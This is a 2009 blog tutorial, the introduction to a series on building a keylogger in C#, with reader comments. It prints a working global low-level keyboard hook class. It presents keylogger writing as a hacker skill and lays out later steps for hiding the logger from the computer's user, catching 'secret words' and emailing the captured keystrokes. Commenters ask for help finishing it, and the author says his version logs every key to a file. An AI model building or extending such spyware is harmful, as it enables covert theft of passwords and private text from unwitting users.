Keylogger in C# :: Introduction
by Arxleol on Friday 06.02.2009, under C#, tutorial
- Image via Wikipedia
It is a kind or obligation for every hacker to know, understand and speak several languages. Of course not languages in sens of English and Russian but more like C#, Java, NASM and so on. Otherwise without any real skill you will end up just being another script kiddie and no more without any respect, not that knowing how to write one keylogger will change this but it will give you head on start.
Therefore, I have decided to show you in the sequence of probably 5 tutorials how to write simple keylogger and do several other things. Depending how this little project goes I might extend it and add functionality like hiding it from the users using computer and saving data and so on…
As always we have introduction to introduce some things. Yeah, speaking rubbish One other thing worthwhile mentioning is that for keylogger to function like any other keyloggers we have to write keyboard hook. To elaborate this quickly and simply, if we want to know what certain user is writing in our own application on which he has focus we easily use built in functions like key or mouse listener but if you would like to obtain what user is writing in the firefox then you need keyhook. In simple terms: our program will receive any character pressed on the keyboard no matter where in windows.
Keylogger series:
- Introduction
- Detecting pressed keys
- Saving content
- Hiding && unhiding Keylogger
- Catching secret words
- Sending emails.
- Finalization
- Complete project
This is some kind of roadmap for the keylogger series I hope that I will have time and resources to provide each week one tutorial for this series.
Introduction
As I have mentioned before we will be using the following class. Please also note to follow this tutorial you need at least some beginners knowledge about either concepts of programming in C# or at least Java since in essence they are the same.
using System; using System.Diagnostics; //using System.Windows.Forms; using System.Runtime.InteropServices; namespace keyboardhook { public static class Hook { //Similar class is on this site: //http://blogs.msdn.com/toub/archive/2006/05/03/589423.aspx private static class API { //dll imports for hooking and unhooking and sending events trough hook hierarchy [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] public static extern IntPtr SetWindowsHookEx( int idHook, HookDel lpfn, IntPtr hMod, uint dwThreadId); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool UnhookWindowsHookEx( IntPtr hhk); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] public static extern IntPtr CallNextHookEx( IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam); [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] public static extern IntPtr GetModuleHandle( string lpModuleName); } public enum VK { //Keycodes may be found on many internet sites. //Some keys are commented feel free to uncomment them, explanations are provided for uncommon ones ;) VK_LBUTTON = 0X01, //Left mouse VK_RBUTTON = 0X02, //Right mouse //VK_CANCEL = 0X03, VK_MBUTTON = 0X04, VK_BACK = 0X08, //Backspace VK_TAB = 0X09, //VK_CLEAR = 0X0C, VK_RETURN = 0X0D, //Enter VK_SHIFT = 0X10, VK_CONTROL = 0X11, //CTRL //VK_MENU = 0X12, VK_PAUSE = 0X13, VK_CAPITAL = 0X14, //Caps-Lock VK_ESCAPE = 0X1B, VK_SPACE = 0X20, VK_PRIOR = 0X21, //Page-Up VK_NEXT = 0X22, //Page-Down VK_END = 0X23, VK_HOME = 0X24, VK_LEFT = 0X25, VK_UP = 0X26, VK_RIGHT = 0X27, VK_DOWN = 0X28, //VK_SELECT = 0X29, //VK_PRINT = 0X2A, //VK_EXECUTE = 0X2B, VK_SNAPSHOT = 0X2C, //Print Screen VK_INSERT = 0X2D, VK_DELETE = 0X2E, //VK_HELP = 0X2F, VK_0 = 0X30, VK_1 = 0X31, VK_2 = 0X32, VK_3 = 0X33, VK_4 = 0X34, VK_5 = 0X35, VK_6 = 0X36, VK_7 = 0X37, VK_8 = 0X38, VK_9 = 0X39, VK_A = 0X41, VK_B = 0X42, VK_C = 0X43, VK_D = 0X44, VK_E = 0X45, VK_F = 0X46, VK_G = 0X47, VK_H = 0X48, VK_I = 0X49, VK_J = 0X4A, VK_K = 0X4B, VK_L = 0X4C, VK_M = 0X4D, VK_N = 0X4E, VK_O = 0X4F, VK_P = 0X50, VK_Q = 0X51, VK_R = 0X52, VK_S = 0X53, VK_T = 0X54, VK_U = 0X55, VK_V = 0X56, VK_W = 0X57, VK_X = 0X58, VK_Y = 0X59, VK_Z = 0X5A, VK_NUMPAD0 = 0X60, VK_NUMPAD1 = 0X61, VK_NUMPAD2 = 0X62, VK_NUMPAD3 = 0X63, VK_NUMPAD4 = 0X64, VK_NUMPAD5 = 0X65, VK_NUMPAD6 = 0X66, VK_NUMPAD7 = 0X67, VK_NUMPAD8 = 0X68, VK_NUMPAD9 = 0X69, VK_SEPERATOR = 0X6C, // | (shift + backslash) VK_SUBTRACT = 0X6D, // - VK_DECIMAL = 0X6E, // . VK_DIVIDE = 0X6F, // / VK_F1 = 0X70, VK_F2 = 0X71, VK_F3 = 0X72, VK_F4 = 0X73, VK_F5 = 0X74, VK_F6 = 0X75, VK_F7 = 0X76, VK_F8 = 0X77, VK_F9 = 0X78, VK_F10 = 0X79, VK_F11 = 0X7A, VK_F12 = 0X7B, //and for the 8 people in the world who do, I think they can live without using them VK_NUMLOCK = 0X90, VK_SCROLL = 0X91, //Scroll-Lock VK_LSHIFT = 0XA0, VK_RSHIFT = 0XA1, VK_LCONTROL = 0XA2, VK_RCONTROL = 0XA3, //VK_LMENU = 0XA4, //VK_RMENU = 0XA5, //VK_PLAY = 0XFA, //VK_ZOOM = 0XFB } //keycodes //There are detailed explanations for these functions on MSDNAA and implementations. public delegate IntPtr HookDel( int nCode, IntPtr wParam, IntPtr lParam); public delegate void KeyHandler( IntPtr wParam, IntPtr lParam); private static IntPtr hhk = IntPtr.Zero; private static HookDel hd; private static KeyHandler kh; //Creation of the hook public static void CreateHook(KeyHandler _kh) { Process _this = Process.GetCurrentProcess(); ProcessModule mod = _this.MainModule; hd = HookFunc; kh = _kh; hhk = API.SetWindowsHookEx(13, hd, API.GetModuleHandle(mod.ModuleName), 0); //13 is the parameter specifying that we're gonna do a low-level keyboard hook //MessageBox.Show(Marshal.GetLastWin32Error().ToString()); //for debugging //Note that this could be a Console.WriteLine(), as well. I just happened //to be debugging this in a Windows Application } public static bool DestroyHook() { //to be called when we're done with the hook return API.UnhookWindowsHookEx(hhk); } //called when key is active private static IntPtr HookFunc( int nCode, IntPtr wParam, IntPtr lParam) { int iwParam = wParam.ToInt32(); //depending on what you want to detect you can either detect keypressed or keyrealased also with a bit tweaking keyclicked. if (nCode >= 0 && (iwParam == 0x100 || iwParam == 0x104)) //0x100 = WM_KEYDOWN, 0x104 = WM_SYSKEYDOWN kh(wParam, lParam); return API.CallNextHookEx(hhk, nCode, wParam, lParam); } } }
Now there are comments to help you with this one. Make sure you have this class since it is base of operations for everything else.
Friday 24.04.2009 on 14:54
May i ask when will you finish the first parts of the guide? I just started to be interested and in all of this and i want to know how to make a keylogger.
Saturday 25.04.2009 on 16:31
I will try to do it as soon as possible.
Wednesday 29.04.2009 on 16:45
Hello
For the KeyHandler routine, could I just create a small function to open a text file and write the data fed to it to the file?
Wednesday 29.04.2009 on 17:20
In my final implementation, I have something similar or maybe the same as you.
Each key pressed on the keyboard (small tweak is required for mouse keys) is recorded or shell I say written to one txt file.
Thursday 30.04.2009 on 13:59
There is obviously a lot to know about this. I think you made some good points in Features also.
Thursday 07.05.2009 on 12:49
[...] Arxleol on Thursday 07.05.2009, under C#, vista, xp Now I take that you did in fact checked my introduction to this topic of keylogger. If you did then you may procede if you did not then I woudl suggest [...]
Friday 29.05.2009 on 22:23
Nice tutorial, can’t wait for the followers. Have been looking all over the internet and finally found something which looks great.
Friday 29.05.2009 on 22:35
Thanks my pleasure.
Sunday 15.11.2009 on 09:55
How do you exactly tweak to detect ONLY a keyUp or KeyDown. I want to avoid catching lots of keys when a key is pressed for a bit longer.
Wednesday 06.01.2010 on 02:08
Checkout detecting pressed keys.
Ax
Tuesday 27.04.2010 on 17:30
This is an exellent tutorial! The only one on the internet that I can get to work. Im not actually making a keylogger, but I used the global key hook in one of my own projects. I need to detect a left mouse click though, but i cant get it to work, I tried adding it to the case/switch, but nothing happens
Wednesday 28.04.2010 on 15:21
The following are to be used to recognize mouse click.
VK_LBUTTON = 0X01, //Left mouse
VK_RBUTTON = 0X02, //Right mouse
//VK_CANCEL = 0X03,
VK_MBUTTON = 0X04,
You have to add them to switch part and after that you can detect them by checking code in temp variable.
If you need further instruction please do ask.
Regards.
Wednesday 28.04.2010 on 20:16
Yes, I did add it to the switch part like this:
case Hook.VK.VK_LBUTTON: temp = “Left mouse”;
break;
and at the end, I put
MessageBox.Show(temp);
but nothing happens when I click the Left mouse buttons (all the keyboard keys work though), so I dont know what the problem is. Anyway, thanks for replying
Thursday 06.05.2010 on 17:53
i have a problem, i dont quit understand what
>= 0 && is for in the if code
if (nCode >= 0 &&
(iwParam == 0×100 ||
iwParam == 0×104)) //0×100 = WM_KEYDOWN, 0×104 = WM_SYSKEYDOWN
kh(wParam, lParam);
Sunday 09.05.2010 on 12:50
Its for detecting which action you did. As explained in comment. Leave it be, you are probably not interested in that part anyway